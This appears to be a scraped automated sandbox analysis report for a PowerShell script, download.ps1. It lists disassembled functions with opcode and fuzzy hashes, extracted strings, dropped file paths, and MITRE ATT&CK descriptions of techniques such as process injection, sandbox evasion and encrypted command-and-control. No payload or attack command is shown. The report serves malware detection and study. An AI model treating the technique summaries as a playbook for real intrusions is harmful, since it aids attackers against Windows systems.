Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75a97552ce10baff21c32a617ddda38465e840e232b2ae26a8ae5d17144435e1
Instruction ID: 2ccc3d044e8f0bca82219dcd460123b110c3fe6364bcc11a2b8613d2d9256b6f
Opcode Fuzzy Hash: 75a97552ce10baff21c32a617ddda38465e840e232b2ae26a8ae5d17144435e1
Instruction Fuzzy Hash: 34B1C43050CA8D4FEB69EF28D8557F93BE1EF65350F04426AE84DC7292CF3499458B86

Function 00007FF8491630C8 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189056444.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849160000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9795865705c7e00968f28afcb215ba5136fb09df1a8b854f4d7566e3619676ff
Instruction ID: 3f506aa9f3d18268f8bc7abafbee8797ede3af91ed5eccd58bd07bb3c8d5b6f1
Opcode Fuzzy Hash: 9795865705c7e00968f28afcb215ba5136fb09df1a8b854f4d7566e3619676ff
Instruction Fuzzy Hash: 1381DF72E0DACA4FE7A7AE2848581747BE1EF66795B0900FEC04DC7193DE289C4B8751

Function 00007FF8491A4B46 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189588591.00007FF8491A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8491a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b15e8fb635ea026496bc258551bb8b0d9a17618b6e596367ee65c78d05b644c
Instruction ID: 52f8eb92df09479ff1d9e02680bcaffe6f2e122760be55a6f6b3b3af35175946
Opcode Fuzzy Hash: 7b15e8fb635ea026496bc258551bb8b0d9a17618b6e596367ee65c78d05b644c
Instruction Fuzzy Hash: 7381F431D0EACA8FEBA9EF2898556647BA1FF65364B1800BDD01DC71C3DA2DAC45CB41

Function 00007FF848F38D3B Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ea3212899bd7a2478bbf5f1f3f8fb2b7559b1565cb880802237ad2ad9345db
Instruction ID: 0d3c1ff1bb4538f92e57ff0ab0430e1a8d461ffd53fd81e8ec05128ee0d1aa59
Opcode Fuzzy Hash: 68ea3212899bd7a2478bbf5f1f3f8fb2b7559b1565cb880802237ad2ad9345db
Instruction Fuzzy Hash: 9551C23062CA498FD788EB1CC495A75B7E1FF98350F50057ED08AC7296DB2AF881C745

Function 00007FF848F417C5 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e991b07137e1cb911017402ba9f1a883732b847cb9b40f0e4fb843ef2f0edf7a
Instruction ID: 44e111902e174bce480e23709108fb72508b81891121286b6fc9194851a591c1
Opcode Fuzzy Hash: e991b07137e1cb911017402ba9f1a883732b847cb9b40f0e4fb843ef2f0edf7a
Instruction Fuzzy Hash: 7131083191CB4C8FDB18DF5C984A6A97BE0FB69311F00826FE049D3292DB74A855CBC2

Function 00007FF848E1E620 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185028607.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0114a89d6328bc969871d70c594232b5254ede7da1fcf7dc5d9b4c8264d3031e
Instruction ID: 7355a1186e016207ac6cb3984ac121fb7daf2cf0d5e77ee5a333bf54817e4046
Opcode Fuzzy Hash: 0114a89d6328bc969871d70c594232b5254ede7da1fcf7dc5d9b4c8264d3031e
Instruction Fuzzy Hash: 3F41157180DBC44FE7569B2998459523FF0FF56260F1505DFE088CB1A3DA25A846C7A2

Function 00007FF848F42068 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94e509a18ffad6d8999b0a201aef4e8bd6851ce33d8fa4f0823141a9ba54a4e5
Instruction ID: 037b587348d4675503de7bd68e4c2a7ee68116d10a9975f380b53db40372a634
Opcode Fuzzy Hash: 94e509a18ffad6d8999b0a201aef4e8bd6851ce33d8fa4f0823141a9ba54a4e5
Instruction Fuzzy Hash: 5B21073190CA4C4FDB58DFAC984A7E97BE0EBA6321F04426FD049C7192D774A45ACB91

Function 00007FF848F476C4 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fc185830333b89d5ac3ac9908a5a7dd2543222041110bc1b431c5fb9b078909
Instruction ID: ef83b173261fb4b3f8d47db9d76dac0026f09343c09005ba512d259cdd12ee69
Opcode Fuzzy Hash: 6fc185830333b89d5ac3ac9908a5a7dd2543222041110bc1b431c5fb9b078909
Instruction Fuzzy Hash: A2310D3081E98E8EFBB4AF14CC05BF93290FF55759F90413AD84D961D2CB386985CB55

Function 00007FF848F35975 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58aa2ebd7c098fc56b75f34559664d8fffd71393fa6ca4f46e7ec02993a6819c
Instruction ID: fbae705b08197d66b934c279ebef35d6ea812222310edeb49c8781ead1417154
Opcode Fuzzy Hash: 58aa2ebd7c098fc56b75f34559664d8fffd71393fa6ca4f46e7ec02993a6819c
Instruction Fuzzy Hash: 2A01677111CB0C4FD744EF0CE451AA5B7E0FB99364F10056EE58AC7695D736E881CB45

Function 00007FF8491E1C6D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2190019907.00007FF8491E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8491e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf7620debd4f3edc2f91898111431137352a404e28d277dcdde4b9f78ef649b0
Instruction ID: 9be5eeca7d8bce6464a6a250ead38db21e4fd8f74768711c8d20eec1559aaff4
Opcode Fuzzy Hash: bf7620debd4f3edc2f91898111431137352a404e28d277dcdde4b9f78ef649b0
Instruction Fuzzy Hash: 9BF09032A0C5858FDB65EB1CE4859A877E0FF05360B1800B7E15DC7167DA2AAC418B55

Function 00007FF8491E1F1B Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2190019907.00007FF8491E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8491e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de90acb953a9c9d5fd203aae4ff93a99000e7f93f67677c98af7a46c3eab7ee7
Instruction ID: e56fa4bc50ff24c4435b5387a7dd3bec0c9fdf0b4f1e1dbe66fc9c06c7ebb468
Opcode Fuzzy Hash: de90acb953a9c9d5fd203aae4ff93a99000e7f93f67677c98af7a46c3eab7ee7
Instruction Fuzzy Hash: 40F09A32A0C5858FEB64EB5CA4458A8B7E0FF05360B0400B6E05DC70A3DB2AEC44CB90

Function 00007FF848F41EB0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04bd7268ad9e626f6a8e437e50892c00baf45aa65c3e2fdd2987d061a620a0b6
Instruction ID: 0cb5132c11e9fe3fb1c3cd3836b972f990bf5037b87c20e99119cf83736f4248
Opcode Fuzzy Hash: 04bd7268ad9e626f6a8e437e50892c00baf45aa65c3e2fdd2987d061a620a0b6
Instruction Fuzzy Hash: 83F0903580C6898FDB06AF2888195D9BFE0FF26350F0402DBE459C70A2DB75A894CB82

Non-executed Functions

Function 00007FF8491A7CDD Relevance: 3.1, Strings: 2, Instructions: 616COMMON

Download Yara Rule

Strings

x6a, xrefs: 00007FF8491A7DF1
x6a, xrefs: 00007FF8491A7D2D

Memory Dump Source

Source File: 00000000.00000002.2189588591.00007FF8491A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8491a0000_powershell.jbxd

Similarity

API ID:
String ID: x6a$x6a
API String ID: 0-2621508617
Opcode ID: a36113ab9985df1ea7a7ccddbf11d469a66e6d0d3a1fcdf7a2bf1e06abbae487
Instruction ID: a7bc4cefa8a2924637bef513d73bda26d55689f7e08e5ad1f4cd9e512bf290b8
Opcode Fuzzy Hash: a36113ab9985df1ea7a7ccddbf11d469a66e6d0d3a1fcdf7a2bf1e06abbae487
Instruction Fuzzy Hash: 5422D271C0D7C65FE367AB3848156A17FA1EF532A4F0901EED089CB1E3E66D5846CB22

Function 00007FF848F3E8D3 Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

[L_^, xrefs: 00007FF848F3E901

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID: [L_^
API String ID: 0-4114095731
Opcode ID: af73d37076b86fb0abb375937f10eff5fff7fc49661b2d9e576b404ff018b317
Instruction ID: 4a195b5d6ceb9519bc427f6a13f5abd581fb6e262d9047ae1b8165c1c34b7604
Opcode Fuzzy Hash: af73d37076b86fb0abb375937f10eff5fff7fc49661b2d9e576b404ff018b317
Instruction Fuzzy Hash: 34617527B2E5269AD64177BDB4460EE7760FF813B9F048273D24C8D0839A1D644646FD

Function 00007FF848F40448 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed2754e31e2ac117c0cae9d78a6007e2d104ff2975d932ca45deb080faeecda6
Instruction ID: b839877bc4d9eb2181f158e82f784bf7c12f4fc223ab5f118a9caf238c00eb63
Opcode Fuzzy Hash: ed2754e31e2ac117c0cae9d78a6007e2d104ff2975d932ca45deb080faeecda6
Instruction Fuzzy Hash: 82012432C0DE894FE3C9E73818905F03BE1EBE5A90B08027BC408DB1E7DE5858248354

Function 00007FF848F3D59D Relevance: 7.6, Strings: 6, Instructions: 115COMMON

Download Yara Rule

Strings

mL_I, xrefs: 00007FF848F3D644
x,I, xrefs: 00007FF848F3D669
X,I, xrefs: 00007FF848F3D629
0,I, xrefs: 00007FF848F3D659
,I, xrefs: 00007FF848F3D649
8,I, xrefs: 00007FF848F3D5E9

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID: 0,I$8,I$X,I$mL_I$x,I$,I
API String ID: 0-2738384902
Opcode ID: 6b8e935c4e9ad90661ce230fb5cf6d32c26137f77c4507554705d97fd6060f0e
Instruction ID: 1a9679ad95047551c7ccd9332e2391841a475f7dbd60c86783762da8b2f05b5a
Opcode Fuzzy Hash: 6b8e935c4e9ad90661ce230fb5cf6d32c26137f77c4507554705d97fd6060f0e
Instruction Fuzzy Hash: E331EC52D0FAC24FF2A6673C3C1D0796F90FF52960B5945FBD088870DBB9199D0A8685

Function 00007FF848F489F2 Relevance: 6.3, Strings: 5, Instructions: 89COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FF848F48A22
K_^, xrefs: 00007FF848F48A72
K_^, xrefs: 00007FF848F48A12
K_^, xrefs: 00007FF848F489F2
K_^, xrefs: 00007FF848F48AC2

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^$K_^
API String ID: 0-3188868157
Opcode ID: 1524ed73776201d29ba7abd6606326811bcf411839b6ea11f5e839f3186a5871
Instruction ID: 732a21e830c2141487c18f6fb8609632deac221a30f93d07817eff5bc24dffc6
Opcode Fuzzy Hash: 1524ed73776201d29ba7abd6606326811bcf411839b6ea11f5e839f3186a5871
Instruction Fuzzy Hash: 8031A4B3E1DAC76FE36A572858650A02FA0FF72A98B4D01E7C8949F0D3EF981C175215

Function 00007FF848F48865 Relevance: 5.1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FF848F48882
K_;, xrefs: 00007FF848F4887C
K_+, xrefs: 00007FF848F4892D
K_k, xrefs: 00007FF848F4890D

Memory Dump Source

Source File: 00000000.00000002.2185943237.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_+$K_;$K_k
API String ID: 0-126535907
Opcode ID: 5aade5871cd8b498b559c4c9ee8d9154402d1df1a6ec0e0bfd8e070c3c199f9d
Instruction ID: 970d574f44e7099f19225e49545865e9f90f1d49cf9072a617838950f162349e
Opcode Fuzzy Hash: 5aade5871cd8b498b559c4c9ee8d9154402d1df1a6ec0e0bfd8e070c3c199f9d
Instruction Fuzzy Hash: A731D26291FBC21FE71357385C291687F90AF636A4B6D00FBC8D45F0D7DB18580AA316

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report download.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3pqnhy0.bcu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mow32suy.pl5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4ou5lqk.a5e.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1iesxrq.zkm.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\82Q4PFWOKMYG9L6IJHQX.temp

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
download.ps1